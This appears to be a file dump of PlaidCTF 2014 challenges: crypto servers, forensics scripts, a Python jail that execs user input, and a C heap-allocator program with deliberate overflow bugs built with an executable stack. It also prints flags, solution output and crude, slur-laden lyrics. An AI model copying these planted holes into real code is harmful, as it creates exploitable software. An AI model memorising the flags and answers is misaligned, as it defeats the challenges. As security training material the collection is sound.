self.request.send("What? You think we're cheaters? Fine, the nonce has been "+ 88 | self.nonce.encode("hex")+"\n") 89 | self.request.send("Who is the cheater now, huh?") 90 | self.nonce = os.urandom(16) 91 | self.user_nonces = [] 92 | elif m == 6: 93 | return 0 94 | 95 | 96 | SocketServer.TCPServer.allow_reuse_address = True 97 | server = threadedserver(("0.0.0.0", 4321), incoming) 98 | server.timeout = 4 99 | server_thread = threading.Thread(target=server.serve_forever) 100 | server_thread.daemon = False 101 | server_thread.start() 102 | 103 | -------------------------------------------------------------------------------- /crypto/twenty/gen.py: -------------------------------------------------------------------------------- 1 | from random import randint 2 | alphabet = "abcdefghijklmnopqrstuvwxyz" 3 | plaintext = filter(lambda z: z in alphabet, open('plaintext').read().lower()) 4 | d = {} 5 | chosen = [] 6 | for c in alphabet: 7 | z = randint(0, 25) 8 | while alphabet[z] in chosen: 9 | z = randint(0, 25) 10 | d[c] = alphabet[z] 11 | chosen.append(alphabet[z]) 12 | 13 | print ''.join(d[c] for c in plaintext) 14 | 15 | -------------------------------------------------------------------------------- /crypto/twenty/plaintext: -------------------------------------------------------------------------------- 1 | This is the world's best rap 2 | 3 | Yo it's geohot 4 | And for those that don't know 5 | I'm getting sued by Sony 6 | 7 | Let's take this out of the courtroom and into the streets 8 | I'm a beast, at the least, you'll face me in the northeast 9 | Get my ire up, light my fire 10 | I'll go harder than Eminem went at Mariah 11 | Call me a liar 12 | Pound me in the ass with no lube, chafing 13 | You're fucking with the dude who got the keys to your safe and 14 | Those that can't do bring suits 15 | Cry to your Uncle Sam to settle disputes 16 | Thought you'd tackle this with a little more tact 17 | But then again fudgepackers, I don't know Jack 18 | 19 | I shed a tear everytime I think of Lik Sang 20 | But shit man, they're a corporation 21 | And I'm a personification of freedom for all 22 | You fill dockets, like thats a concept foreign to y'all 23 | While lawyers muddy water and TROs stall 24 | Out of business is jail for me 25 | And you're suing me civilly 26 | 27 | Exhibit this in the courtroom 28 | Go on, do it, I dare you 29 | 30 | Congratulations the flag is sincenewcryptomighthavensabackdoorsiuseoldcrypto. 31 | -------------------------------------------------------------------------------- /crypto/twenty/twenty.txt: -------------------------------------------------------------------------------- 1 | fvoxoxfvwdepagxmwxfpukleofxhwevefuygzepfvexwfvufgeyfryedojhwffoyhxcwgmlxeylawfxfurwfvoxecfezfvwbecpfpeejuygoyfefvwxfpwwfxojumwuxfuffvwawuxflecaazubwjwoyfvwyepfvwuxfhwfjlopwckaohvfjlzopwoaahevupgwpfvuywjoywjdwyfufjupouvbuaajwuaoupkecygjwoyfvwuxxdofvyeacmwbvuzoyhlecpwzcbroyhdofvfvwgcgwdveheffvwrwlxfelecpxuzwuygfvexwfvufbuyfgempoyhxcofxbplfelecpcybawxujfexwffawgoxkcfwxfvechvflecgfubrawfvoxdofvuaoffawjepwfubfmcffvwyuhuoyzcghwkubrwpxogeyfryediubroxvwgufwupwswplfojwofvoyrezaorxuyhmcfxvofjuyfvwlpwubepkepufoeyuygojukwpxeyozobufoeyezzpwwgejzepuaaleczoaagebrwfxaorwfvufxubeybwkfzepwohyfeluaadvoawaudlwpxjcggldufwpuygfpexxfuaaecfezmcxoywxxoxiuoazepjwuyglecpwxcoyhjwbosoaalwnvomoffvoxoyfvwbecpfpeejheeygeofogupwlecbeyhpufcaufoeyxfvwzauhoxxoybwywdbplkfejohvfvuswyxumubrgeepxocxweagbplkfe 2 | -------------------------------------------------------------------------------- /crypto/wheeeeeeeeeeeeeeeeeeeeeee/check: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/crypto/wheeeeeeeeeeeeeeeeeeeeeee/check -------------------------------------------------------------------------------- /crypto/wheeeeeeeeeeeeeeeeeeeeeee/cimpl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/crypto/wheeeeeeeeeeeeeeeeeeeeeee/cimpl -------------------------------------------------------------------------------- /crypto/wheeeeeeeeeeeeeeeeeeeeeee/server.py: -------------------------------------------------------------------------------- 1 | from hashlib import sha512,sha1 2 | import random,sys,struct 3 | import SocketServer 4 | import base64 as b64 5 | import os 6 | import hmac 7 | from time import time 8 | import math 9 | from hashlib import sha512 10 | import array,binascii 11 | import collections 12 | from hashlib import sha512,sha1 13 | import base64 as b64 14 | import random,sys,struct 15 | import SocketServer,os 16 | from time import time 17 | from subprocess import Popen, PIPE 18 | import threading 19 | 20 | KEY = [2633, 3247]# [0, 0] # Not the real key, obviously... 21 | FLAGE = "Gotta love it when you can SLIDE. The flage is id_almost_rather_be_sledding" 22 | ENC_FLAGE = "85b3e329c9825ce21133ea8afc232f9eb575fbfe9479900c89b682b28e6d8c73c9ff0042b27766d5e2de33ea8a95037ae50048701ec5225a9360d9163ba61f4747d828a1c420b0692b426f" 23 | 24 | M = 12 25 | N = M * 2 26 | K = N 27 | numrounds = 2 ** 24 # Protip: would not bruteforce this if I were you. 28 | 29 | def genTable(seed="Function shamelessly stolen from bagre"): 30 | fSub = {} 31 | fInvSub = {} 32 | i = 0 33 | prng = sha512() 34 | prng.update(seed) 35 | seed = prng.digest() 36 | cSeed = "" 37 | for x in xrange(2048): 38 | cSeed+=prng.digest() 39 | prng.update(str(x)+prng.digest()) 40 | fCharSub = [0]*(2**M) 41 | gCharSub = [0]*(2**M) 42 | unused = range(2**M) 43 | for x in xrange(0,2**(M+1),2): 44 | curInd = (ord(cSeed[x]) + (ord(cSeed[x + 1]) << 8)) % len(unused) 45 | toDo = unused[curInd] 46 | del unused[curInd] 47 | fSub[x / 2] = toDo 48 | fInvSub[toDo] = x / 2 49 | return fSub, fInvSub 50 | 51 | f, fInv = genTable() 52 | f2, fInv2 = genTable("Good thing I didn't also steal the seed!") 53 | 54 | def F(s, k): 55 | return f[s ^ k] 56 | 57 | def F2(s, k): 58 | return f2[s^k] 59 | 60 | def FInv(s, k): 61 | return fInv[s] ^ k 62 | def F2Inv(s, k): 63 | return fInv2[s] ^k 64 | 65 | def get_key(key, n): 66 | return key[n & 1] 67 | 68 | def encrypt_block(plaintext, key): 69 | txt = plaintext 70 | l, r = (txt >> M) & ((1 << M) - 1), txt & ((1 << M) - 1) 71 | for x in xrange(numrounds): 72 | if x % 2 == 0: 73 | l1 = r 74 | r1 = l ^ F(r, key[0]) 75 | l, r = l1, r1 76 | else: 77 | l1 = l 78 | r1 = l ^ F2(r, key[1]) 79 | l, r = l1, r1 80 | return l << M | r 81 | 82 | def decrypt_block(ciphertext, key): 83 | txt = ciphertext 84 | l, r = (txt >> M) & ((1 << M) - 1), txt & ((1 << M) - 1) 85 | for x in xrange(numrounds): 86 | y = numrounds - x - 1 87 | if y % 2 == 0: 88 | r0 = l 89 | l0 = r ^ F(l, get_key(key, y)) 90 | l, r = l0, r0 91 | else: 92 | l0 = l 93 | r0 = F2Inv(l ^ r, get_key(key, y)) 94 | l, r = l0, r0 95 | return l << M | r 96 | 97 | def extract(s): 98 | c = 0 99 | for x in s: 100 | c = (c << 8) | ord(x) 101 | return c 102 | 103 | def intract(n): 104 | s = [] 105 | while n > 0: 106 | s.append(chr(n & 0xff)) 107 | n = n >> 8 108 | return ''.join(s[::-1]) 109 | 110 | def get_blocks(txt): 111 | n = N / 8 112 | if len(txt) % n != 0: 113 | txt += '\x00' * (n - len(txt) % n) 114 | block_strs = [txt[i*n:i*n+n] for i in range(len(txt) / n)] 115 | return [extract(s) for s in block_strs] 116 | 117 | def unblocks(l): 118 | z = [intract(x) for x in l] 119 | s = ''.join(z) 120 | s = s.strip('\x00') 121 | return s 122 | 123 | # Whee ECB 124 | def encrypt(plaintext): 125 | blocks = get_blocks(plaintext) 126 | ars = [str(len(blocks))] + [str(block) for block in blocks] 127 | process = Popen(["./cimpl", str(KEY[0]), str(KEY[1])], stdin=PIPE, stdout=PIPE) 128 | (output, _) = process.communicate("\n".join(ars) + "\n") 129 | output = map(int, output.split('\n')[:-1]) 130 | return unblocks(output) 131 | def decrypt(ciphertext): 132 | blocks = get_blocks(ciphertext) 133 | out = [decrypt_block(block, KEY) for block in blocks] 134 | return unblocks(out) 135 | 136 | class HandleCryptoService(SocketServer.BaseRequestHandler): 137 | def doPOW(self): 138 | req=self.request 139 | proof = b64.b64encode(os.urandom(12)) 140 | req.sendall("We would first like some proof of work.\n") 141 | req.sendall("Send us a string starting with %s, of length %s, such that its sha1 sum ends in ffffff\n"% (proof, str(len(proof)+5))) 142 | test = req.recv(21) 143 | req.recv(1) 144 | ha = sha1() 145 | ha.update(test) 146 | if (test[0:16] != proof or ha.digest()[-3:] != "\xff\xff\xff"): 147 | req.sendall("Invalid proof of work!\n") 148 | req.close() 149 | return False 150 | return True 151 | 152 | def handle(self): 153 | req = self.request 154 | if (not (self.doPOW())): 155 | req.close() 156 | return 157 | req.sendall("WHHEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\n") 158 | req.sendall(ENC_FLAGE + '\n') 159 | req.sendall("Send your encryption string: \n") 160 | data = req.recv(2049)[:-1].decode('hex') 161 | resp = encrypt(data) 162 | req.sendall(resp.encode('hex') + '\n') 163 | req.close() 164 | 165 | class ThreadedServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): 166 | pass 167 | 168 | def checkKey(): 169 | global ENC_FLAGE 170 | print "checking key..." 171 | valid = True 172 | process = Popen(["./check", str(KEY[0]), str(KEY[1])], stdin=PIPE, stdout=PIPE) 173 | blocks = get_blocks(FLAGE) 174 | try: 175 | (output, _) = process.communicate("\n".join([str(len(blocks))] + [str(x) for x in blocks])) 176 | except: 177 | valid = False 178 | if valid: 179 | ENC_FLAGE = output.strip('\n') 180 | return valid 181 | 182 | def updateKey(): 183 | global KEY 184 | print "Changing key..." 185 | print "Old key:", KEY 186 | KEY = [random.randint(0, (1 << (K >> 1)) - 1), random.randint(0, (1 << (K >> 1)) -1)] 187 | while not checkKey(): 188 | KEY = [random.randint(0, (1 << (K >> 1)) - 1), random.randint(0, (1 << (K >> 1)) -1)] 189 | print "New key:", KEY 190 | print "New ENC_FLAGE:", ENC_FLAGE 191 | threading.Timer(10 * 60, updateKey, []).start() 192 | 193 | if __name__ == "__main__": 194 | HOST, PORT = "", 0 195 | threading.Timer(1, updateKey, []).start() 196 | ThreadedServer.allow_reuse_address = True 197 | server = ThreadedServer((HOST, PORT), HandleCryptoService) 198 | server.allow_reuse_address = True 199 | server.serve_forever() 200 | 201 | -------------------------------------------------------------------------------- /crypto/wheeeeeeeeeeeeeeeeeeeeeee/solutions/mserrano/csol: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/crypto/wheeeeeeeeeeeeeeeeeeeeeee/solutions/mserrano/csol -------------------------------------------------------------------------------- /crypto/wheeeeeeeeeeeeeeeeeeeeeee/solutions/mserrano/example_run.txt: -------------------------------------------------------------------------------- 1 | mserrano@euler ~/hm% python client.py 2 | Block size 24 3 | Feistel, so we need 2 7 bit pools. 4 | Compared to a 24 bit bruteforce. 5 | Our total runtime will be O(2^26) compared to O(2^42.0) for bruteforce. 6 | So, we need a 12 bit prefix/postfix. 7 | Our prefix will be 0xfff 8 | But it doesn't actually matter what it is. 9 | Okay, we have our plaintext pools. 10 | Now go get ciphertexts. 11 | Got first pool. 13.8609449863 12 | Got ciphertexts. 13 | 27.7637848854 14 | Okay, now we need to be clever. 15 | Outer iteration 0 7.86781311035e-06 16 | Outer iteration 1 0.675776958466 17 | Outer iteration 2 1.34178495407 18 | Outer iteration 3 2.02189302444 19 | Outer iteration 4 2.69539499283 20 | Outer iteration 5 3.38463783264 21 | Outer iteration 6 4.04581284523 22 | Outer iteration 7 4.71696281433 23 | Outer iteration 8 5.39439487457 24 | Outer iteration 9 6.07403588295 25 | Outer iteration 10 6.74686098099 26 | Outer iteration 11 7.43512201309 27 | Outer iteration 12 8.14160203934 28 | Outer iteration 13 8.82401490211 29 | Outer iteration 14 9.51371002197 30 | Outer iteration 15 10.2053599358 31 | Outer iteration 16 10.907130003 32 | Outer iteration 17 11.6007759571 33 | Outer iteration 18 12.2856488228 34 | Outer iteration 19 12.9789068699 35 | Outer iteration 20 13.657984972 36 | Outer iteration 21 14.3479809761 37 | Outer iteration 22 15.0410718918 38 | Outer iteration 23 15.7365038395 39 | Outer iteration 24 16.4958968163 40 | Outer iteration 25 17.1787438393 41 | Outer iteration 26 17.8528800011 42 | Outer iteration 27 18.5410439968 43 | Outer iteration 28 19.226929903 44 | Outer iteration 29 19.9167859554 45 | Outer iteration 30 20.5939748287 46 | Outer iteration 31 21.2792258263 47 | Outer iteration 32 21.968200922 48 | Outer iteration 33 22.6377549171 49 | Outer iteration 34 23.3202588558 50 | Outer iteration 35 23.9967238903 51 | Outer iteration 36 24.6890740395 52 | Outer iteration 37 25.3801848888 53 | Found a slid pair! 54 | Resulting key (2633, 3247) 55 | Gotta love it when you can SLIDE. The flage is id_almost_rather_be_sledding 56 | -------------------------------------------------------------------------------- /crypto/wheeeeeeeeeeeeeeeeeeeeeee/wheeeee.py: -------------------------------------------------------------------------------- 1 | from hashlib import sha512,sha1 2 | import random 3 | 4 | KEY = [0, 0] 5 | 6 | M = 12 7 | N = M * 2 8 | K = N 9 | numrounds = 2 ** 24 # Protip: would not bruteforce this if I were you. 10 | 11 | def genTable(seed="Function shamelessly stolen from bagre"): 12 | fSub = {} 13 | i = 0 14 | prng = sha512() 15 | prng.update(seed) 16 | seed = prng.digest() 17 | cSeed = "" 18 | for x in xrange(2048): 19 | cSeed+=prng.digest() 20 | prng.update(str(x)+prng.digest()) 21 | fCharSub = [0]*(2**M) 22 | gCharSub = [0]*(2**M) 23 | unused = range(2**M) 24 | for x in xrange(0,2**(M+1),2): 25 | curInd = (ord(cSeed[x]) + (ord(cSeed[x + 1]) << 8)) % len(unused) 26 | toDo = unused[curInd] 27 | del unused[curInd] 28 | fSub[x / 2] = toDo 29 | return fSub 30 | 31 | f = genTable() 32 | f2 = genTable("Good thing I didn't also steal the seed!") 33 | 34 | def gen_key(): 35 | k0 = random.randint(0,2**(K/2)-1) 36 | k1 = random.randint(0,2**(K/2)-1) 37 | return [k0, k1] 38 | 39 | def F(s, k): 40 | return f[s ^ k] 41 | 42 | def F2(s, k): 43 | return f2[s^k] 44 | 45 | def get_key(key, n): 46 | return key[n & 1] 47 | 48 | def encrypt_block(plaintext, key): 49 | txt = plaintext 50 | l, r = (txt >> M) & ((1 << M) - 1), txt & ((1 << M) - 1) 51 | for x in xrange(numrounds): 52 | if x % 2 == 0: 53 | l1 = r 54 | r1 = l ^ F(r, key[0]) 55 | l, r = l1, r1 56 | else: 57 | l1 = l 58 | r1 = l ^ F2(r, key[1]) 59 | l, r = l1, r1 60 | return l << M | r 61 | 62 | def extract(s): 63 | c = 0 64 | for x in s: 65 | c = (c << 8) | ord(x) 66 | return c 67 | 68 | def intract(n): 69 | s = [] 70 | while n > 0: 71 | s.append(chr(n & 0xff)) 72 | n = n >> 8 73 | return ''.join(s[::-1]) 74 | 75 | def get_blocks(txt): 76 | n = N / 8 77 | if len(txt) % n != 0: 78 | txt += '\x00' * (n - len(txt) % n) 79 | block_strs = [txt[i*n:i*n+n] for i in range(len(txt) / n)] 80 | return [extract(s) for s in block_strs] 81 | 82 | def unblocks(l): 83 | z = [intract(x) for x in l] 84 | s = ''.join(z) 85 | s = s.strip('\x00') 86 | return s 87 | 88 | def encrypt(plaintext): 89 | blocks = get_blocks(plaintext) 90 | out = [encrypt_block(block, KEY) for block in blocks] 91 | return unblocks(out) 92 | 93 | 94 | -------------------------------------------------------------------------------- /forensics/curlcore/curlcore.sh: -------------------------------------------------------------------------------- 1 | #/bin/sh 2 | 3 | sudo rm /tmp/capture 2>/dev/null 4 | sudo dumpcap -i eth0 -w /tmp/capture & 5 | DUMPCAPPID=$! 6 | 7 | sleep 1 8 | OUTPUT="`/usr/bin/env -i /bin/dash -c 'ulimit -c unlimited; curl -k https://curlcore.local.plaidctf.com/flag.html & PID=$!; sleep 5; printf "generate-core-file\ninfo proc mappings\ndetach\n" | sudo gdb attach $PID; wait'`" 9 | sleep 1 10 | 11 | sudo kill -INT $DUMPCAPPID 12 | wait 13 | 14 | sudo chown `whoami` /tmp/capture 15 | 16 | echo "$OUTPUT" 17 | 18 | sudo mv "`echo "$OUTPUT" | grep -o 'Saved corefile .*$' | cut -c 16-`" /tmp/corefile 19 | sudo chown `whoami` /tmp/corefile 20 | 21 | 22 | echo "$OUTPUT" | awk '/Mapped address spaces/,/(gdb)/' | grep -v '(gdb)' > /tmp/coremaps 23 | 24 | rm /tmp/curlcore.tgz 2>/dev/null 25 | tar czf /tmp/curlcore.tgz `grep -o ' /.*$' /tmp/coremaps | sort -us | tr '\n' ' '` /tmp/corefile /tmp/coremaps /tmp/capture "$0" 26 | -------------------------------------------------------------------------------- /forensics/curlcore/makepem.sh: -------------------------------------------------------------------------------- 1 | openssl req -x509 -newkey rsa:2048 -nodes -days 100 -keyout pem.pem -out pem.pem -extensions v3_req -subj '/C=US/O=Plaid Parliament of Pwning/CN=curlcore.local.plaidctf.com' -------------------------------------------------------------------------------- /forensics/curlcore/sslserve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import BaseHTTPServer, SimpleHTTPServer 3 | import ssl 4 | 5 | from time import sleep 6 | 7 | class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): 8 | def do_GET(self): 9 | if self.path != "/flag.html": 10 | self.send_response(404) 11 | return 12 | self.send_response(200) 13 | sleep(10) 14 | self.send_header("Content-type", "text/html") 15 | self.end_headers() 16 | self.wfile.write('''\ 17 | 18 | 19 | 20 | 21 | curlcore 22 | 23 | 24 |

CONGRATULATIONS!

25 |

26 | Your flag is: congratz_you_beat_openssl_as_a_whitebox 27 |

28 | 29 | 30 | ''') 31 | 32 | httpd = BaseHTTPServer.HTTPServer(('10.211.55.2', 443), MyHandler) 33 | httpd.socket = ssl.wrap_socket (httpd.socket, certfile='pem.pem', server_side=True) 34 | httpd.serve_forever() 35 | -------------------------------------------------------------------------------- /forensics/rsa/README: -------------------------------------------------------------------------------- 1 | Okay, this isn't /really/ a forensics problem, but why not beef up our forensics 2 | category? This is like real world forensics, which just happens to be crypto. 3 | 4 | Anyway, participants are given a printout of openssl dumping an RSA key. 5 | However, a lot of it has been corrupted! ~70% of the bytes have been erased. 6 | 7 | They need to use fancy maths to recover the RSA key, which is very doable, but 8 | also very non-trivial. We should also make it clear that this is a crypto 9 | challenge, not a forensics challenge. 10 | -------------------------------------------------------------------------------- /forensics/rsa/corrupted.pem: -------------------------------------------------------------------------------- 1 | r e y: ( 2 | o lu : 3 | :d :f : d:b1:4 :5d: 2: 6: : 2: :8 : : : 4 | :c :0 : 1: c: 7: : : : : f: : :2c:6 : 5 | : 2: : 3: : f: :d : : : :a : 7: : e: 6 | b:7 : : :5 : 0:2 : : : 0: :9 : :2 : : 7 | e :7 : :30:d :0 : : : : : : : : : : 8 | e : : : : : : : : 3:95:f : c: :6 : : 9 | 8: :b9:dd: : : : :5 :8e: 0:41: 3: : : 10 | 0:3 :e :09: 0: :1 :5 :6 : :0 :0 : 3: : 5: 11 | 4: : : : : : : : b 12 | c xpon n : 53 (0 0 1 13 | v te xp n : 14 | f: : : a: a:9 :e : : 1: 2: : :e : :1 : 15 | 3 : 1: : : : a: :2 : : : : : : : : 16 | 9 : a: : : : : : 5:c1: 0:b : 3: 2:0 :b0: 17 | :c : f: :f : :d2: : : d: :1 : :3 : : 18 | : : :0 : 3: : : 5:c : :3 :6 : :a4: : 19 | 4 : : :8f: : : : : a: : c:5f: 7: 6: : 20 | 1: : b: : 5: :84:0 :b : f: 3: : : 4: 6: 21 | : : 5:1 : :d : : f: : c: : : 5: : : 22 | :e :f4:b :4 :8e: : 23 | r : 24 | 00: :6 : 1:1 : :b :0 : 2:c : b:2 : : a:1 : 25 | c : : 0: :28:0 : :cd: : 8: : :20: c: : 26 | : 5: :9 : c:3 : : : a:b :c :3 : : : : 27 | f: : : f: 1: 1:b : : c:f : a: :a : : : 28 | a:38: :6 : 29 | i : 30 | :e : :d :2 :6 : 7: :33: :46: : 4: : : 31 | :5 : : 4:6 : : 6: : e:d : : : 9: e:1 : 32 | : : : : :0 : : : :c : 5: : :a :0 : 33 | 6 : : :8 :e9:f : f:7 :5 : e:1 : : : 1:9 : 34 | 4:d :e9: 6: 35 | x n 1: 36 | 9:d : 5: :c :67: : 9: : : : d: : : 3: 37 | f:6 : 0:c : :6 :ad: :2 :d :d : : :0 :7 : 38 | :5 : 6: : 5:1 :f : d: : 2: : : 2: 3: : 39 | 9 : : : : :67: 3: :4 : 7:c0: 4:b :c :f : 40 | :3 :b : 1 41 | x on t : 42 | 1 : 9:47:8 : : : : 3: : : :6 : : :0 : 43 | e :e :8 : : : : : 1:c :74: : :d : 9:3 : 44 | 5 : e: : 2: :7 : 2:c : : : : :5 : : 8: 45 | : :c : : 1: :a : : 9: 5: : 3: : e:c : 46 | : : 6: 47 | c e i t: 48 | :a :d :84:f : : c:43: : : : 6: : : : 49 | : b: :c :9 : : : : : : 4:23:8b: :6 : 50 | 2 : 2: : : 7:5b: : : :7 : : : : : : 51 | f1:7 :1 : :f : a: : 5: : : : 5: : c: 1: 52 | :48: b: 6: 53 | -------------------------------------------------------------------------------- /forensics/rsa/encrypted: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/forensics/rsa/encrypted -------------------------------------------------------------------------------- /forensics/rsa/key: -------------------------------------------------------------------------------- 1 | crypt0>>>f0rensics3~ 2 | -------------------------------------------------------------------------------- /forensics/rsa/public.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDb+r2xSV0ydudia4R5bp/CD6E8 3 | F0TxDIw/PjwsYEDC5/MT36PR/hDRrld8/qt0UqpTEC7ve+AJnAIlYOV6XDDVCUBk 4 | LRsJfdIQmuAvLc/4GYzVo5X8rEJmEHhIud1jw4fSU45QQVNDBCAz6gnAhBVeZSsP 5 | BiNA1dRxekAqnYBqawIDAQAB 6 | -----END PUBLIC KEY----- 7 | -------------------------------------------------------------------------------- /pwnables/__nightmares__/nightmares.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python -u 2 | ''' 3 | You may wish to refer to solutions to the pCTF 2013 "pyjail" problem if 4 | you choose to attempt this problem, BUT IT WON'T HELP HAHAHA. 5 | ''' 6 | 7 | from imp import acquire_lock 8 | from threading import Thread 9 | from sys import modules, stdin, stdout 10 | 11 | # No more importing! 12 | x = Thread(target = acquire_lock, args = ()) 13 | x.start() 14 | x.join() 15 | del x 16 | del acquire_lock 17 | del Thread 18 | 19 | # No more modules! 20 | for k, v in modules.iteritems(): 21 | if v == None: continue 22 | if k == '__main__': continue 23 | v.__dict__.clear() 24 | 25 | del k, v 26 | 27 | __main__ = modules['__main__'] 28 | modules.clear() 29 | del modules 30 | 31 | # No more anything! 32 | del __builtins__, __doc__, __file__, __name__, __package__ 33 | 34 | print >> stdout, "Get a shell. The flag is NOT in ./key, ./flag, etc." 35 | while 1: 36 | exec 'print >> stdout, ' + stdin.readline() in {'stdout':stdout} 37 | -------------------------------------------------------------------------------- /pwnables/ezhp/Makefile: -------------------------------------------------------------------------------- 1 | all: ezhp 2 | 3 | ezhp: ezhp.c 4 | gcc -m32 -z execstack -std=c99 -w $^ -o $@ 5 | strip $@ 6 | 7 | .PHONY: clean 8 | clean: 9 | rm ezhp 10 | 11 | -------------------------------------------------------------------------------- /pwnables/ezhp/ezhp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/pwnables/ezhp/ezhp -------------------------------------------------------------------------------- /pwnables/ezhp/ezhp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // yay for a hilariously bad memory allocator.. 7 | struct mm_header { 8 | size_t sz; 9 | struct mm_header *next; 10 | struct mm_header *prev; 11 | char buf[0]; 12 | }; 13 | 14 | typedef struct mm_header mm_header; 15 | 16 | mm_header *base; 17 | 18 | void __attribute__((constructor)) init_heap(void) { 19 | size_t base_amount = 2*sizeof(mm_header) + (1 << 10); 20 | base = sbrk(base_amount); 21 | base->next = base->prev = NULL; 22 | base->sz = sizeof(mm_header); 23 | mm_header *n = base + 1; 24 | base->next = n; 25 | n->prev = base; 26 | n->next = NULL; 27 | n->sz = (1 << 10); 28 | } 29 | 30 | #define THRESHOLD (sizeof(mm_header) * 4) 31 | void *allocate(size_t sz) { 32 | sz += sizeof(mm_header); 33 | sz += sizeof(mm_header) - (sz % sizeof(mm_header)); 34 | mm_header *curr = base; 35 | while (curr && (curr->sz < sz || (curr->sz & 1))) { 36 | curr = curr->next; 37 | } 38 | if (!curr) { 39 | size_t base_amount = sizeof(mm_header) + (1 << 10); 40 | if (sz < base_amount) sz = base_amount; 41 | curr = sbrk(sz); 42 | curr->next = NULL; 43 | curr->sz = sz; 44 | mm_header *last = base; 45 | while (last->next) { last = last->next; } 46 | last->next = curr; 47 | curr->prev = last; 48 | curr->sz |= 1; 49 | return &curr->buf; 50 | } 51 | if (curr->sz - sz > THRESHOLD) { 52 | // split the block. 53 | mm_header *prev = curr->prev; 54 | mm_header *next = curr->next; 55 | mm_header *new_block = (mm_header *)((char *)curr + sz); 56 | new_block->prev = curr; 57 | new_block->next = next; 58 | new_block->sz = curr->sz - sz; 59 | if (next) next->prev = new_block; 60 | curr->next = new_block; 61 | curr->sz = sz; 62 | curr->sz |= 1; 63 | return &curr->buf; 64 | } 65 | curr->sz |= 1; 66 | return &curr->buf; 67 | } 68 | 69 | void deallocate(void *v) { 70 | if (!v) return; 71 | mm_header *curr = (mm_header *)((char *)v - sizeof(mm_header)); 72 | mm_header *prev = curr->prev; 73 | mm_header *next = curr->next; 74 | // we don't bother coalescing. 75 | if (prev) prev->next = next; 76 | if (next) next->prev = prev; 77 | curr->next = base->next; 78 | if (base->next) base->next->prev = curr; 79 | base->next = curr; 80 | curr->sz &= ~1; 81 | } 82 | 83 | #define MAX_NOTES 1024 84 | 85 | char *notes[MAX_NOTES]; 86 | int note_count = 0; 87 | 88 | void add_note() { 89 | if (MAX_NOTES-1 <= note_count) { puts("The emperor says there are too many notes!"); fflush(stdout); return; } 90 | size_t sz; 91 | puts("Please give me a size."); 92 | fflush(stdout); 93 | scanf("%d%*c", &sz); 94 | 95 | char *note = allocate(sz); 96 | notes[note_count] = note; 97 | note_count++; 98 | } 99 | 100 | void remove_note() { 101 | int id; 102 | puts("Please give me an id."); 103 | fflush(stdout); 104 | scanf("%d%*c", &id); 105 | if (id > note_count || id < 0) return; 106 | if (notes[id]) deallocate(notes[id]); 107 | notes[id] = NULL; 108 | } 109 | 110 | void read_into_note() { 111 | puts("Please give me an id."); 112 | fflush(stdout); 113 | int id; 114 | scanf("%d%*c", &id); 115 | if (id > note_count || id < 0) return; 116 | if (!notes[id]) return; 117 | size_t sz; 118 | puts("Please give me a size."); 119 | fflush(stdout); 120 | scanf("%d%*c", &sz); 121 | puts("Please input your data."); 122 | fflush(stdout); 123 | read(STDIN_FILENO, notes[id], sz); 124 | } 125 | 126 | void print_note() { 127 | int id; 128 | puts("Please give me an id."); 129 | fflush(stdout); 130 | scanf("%d%*c", &id); 131 | if (id > note_count || id < 0) { return; } 132 | puts(notes[id]); 133 | } 134 | 135 | int read_menu_option() { 136 | int res; 137 | puts("Please choose an option."); 138 | fflush(stdout); 139 | scanf("%d%*c", &res); 140 | return res; 141 | } 142 | 143 | void print_menu() { 144 | puts("Please enter one of the following:"); 145 | puts("1 to add a note."); 146 | puts("2 to remove a note."); 147 | puts("3 to change a note."); 148 | puts("4 to print a note."); 149 | puts("5 to quit."); 150 | fflush(stdout); 151 | } 152 | 153 | int main() { 154 | int opt = 0; 155 | while (opt != 5) { 156 | print_menu(); 157 | opt = read_menu_option(); 158 | switch (opt) { 159 | case 1: 160 | add_note(); break; 161 | case 2: 162 | remove_note(); break; 163 | case 3: 164 | read_into_note(); break; 165 | case 4: 166 | print_note(); break; 167 | case 5: 168 | break; 169 | default: 170 | exit(0); break; 171 | } 172 | } 173 | return 0; 174 | } 175 | -------------------------------------------------------------------------------- /pwnables/harry_potter/Makefile: -------------------------------------------------------------------------------- 1 | CXXFLAGS = -Os -g -fstack-protector 2 | LDFLAGS = 3 | OBJECTS = except.o aes256.o SHA256.o 4 | 5 | .PHONY: clean 6 | 7 | except: $(OBJECTS) 8 | $(CXX) $(CXXFLAGS) $(LDFLAGS) -o $@ $^ 9 | 10 | clean: 11 | $(RM) $(OBJECTS) 12 | 13 | -------------------------------------------------------------------------------- /pwnables/harry_potter/SHA256.h: -------------------------------------------------------------------------------- 1 | #ifndef SHA256_H 2 | 3 | #define SHA256_H 4 | 5 | // The header file defines a method to compute the SHA256 hash of a block of input data. 6 | // 7 | // This in 'snippet' form and has no external dependencies other than on 'stdint.h' which is available on most compilers. 8 | // 9 | // https://en.wikipedia.org/wiki/SHA-2 10 | // 11 | // The actual implementation of the method is a copy of the code written by Zilong Tan (eric.zltan@gmail.com) and released under MIT license 12 | // 13 | 14 | #include 15 | #include // Include stdint.h; available on most compilers but, if not, a copy is provided here for Microsoft Visual Studio 16 | 17 | void computeSHA256(std::string& input, // A pointer to the input data to have the SHA256 hash computed for it. 18 | uint8_t destHash[32]); // The output 256 bit (32 byte) hash 19 | 20 | #endif 21 | -------------------------------------------------------------------------------- /pwnables/harry_potter/aes256.h: -------------------------------------------------------------------------------- 